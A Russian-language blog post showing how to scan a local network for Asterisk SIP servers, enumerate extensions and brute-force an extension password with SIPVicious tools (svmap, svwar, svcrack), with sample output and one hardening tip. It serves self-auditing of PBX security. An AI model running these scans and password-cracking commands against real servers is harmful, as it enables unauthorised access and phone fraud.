воскресенье, 3 июня 2012 г.

взлом asterisk с помощью sipvicious-0.2.7

sipvicious. Это SIP сканер, который может быть использован для сканирования SIP серверов, таких как Asterisk, FreePBX, Trixbox и тому подобные.
Скачиваем sipvicious распаковываем содержимое архива и делаем исполняемыми файлы


chmod +x svmap.py
chmod +x svcrack.py
теперь мы должны найти IP адрес SIP сервера для атаки. Я конечно же знаю адрес моего сервера, но попробую его искать как это бы сделал хакер
./svmap.py 192.168.5.0/24
сканируем все 256 ip адресов в сети 
 
 
| SIP Device         | User Agent                      | Fingerprint |
----------------------------------------------------------------------
| 192.168.5.1:5060   | Asterisk PBX                    | disabled    |
| 192.168.5.122:5060 | Asterisk PBX 1.6.2.5-0ubuntu1.4 | disabled    | 

получаем примерно такой результат и видим что заданном диапазоне ip адресов находится два сервера asterisk.
теперь попробуем узнать какие extensions заведены на сервере с адресом  192.168.5.1
./svwar.py -e 100-500 192.168.5.1
после параметра -е указываем в диапазон extensions у нас это будет от 100 до 500 и указываем ip адрес 192.168.5.1
 
| Extension | Authentication |
------------------------------
| 100       | reqauth        |
| 101       | reqauth        |

Теперь давайте попробуем подобрать пароль для extension 101
 
./svcrack.py -u101 -r100-150 192.168.5.1
 
получаем пароль 132 для extension 101
 
| Extension | Password |
------------------------
| 101       | 132      |
 
Ключ «-u101″ задает svcrack расширение (номер телефона) к которому требуется подобрать пароль, диапозон значений для перебора задается ключом «-r100-150″. Попробовать все числа от 100 до 150 и подобрать пароль заняло 3 секунды. Это определенно не очень хорошая идея использовать простые пароли для ваших паролей extension!
 
Итак, что мы можем сделать, чтобы защитить себя?
Установить «alwaysauthreject = yes» в файле конфигурации sip.conf 'то нужно чтобы предотвратить попытки сканирования SIP сканером.
Написал сюда чисто, что бы не забыть. Никоим образом не несу ответственности за чьи то взломанные PBX. Пост написан для проверки себя на дыры и в ознакомительных целях

Комментариев нет:

Отправить комментарий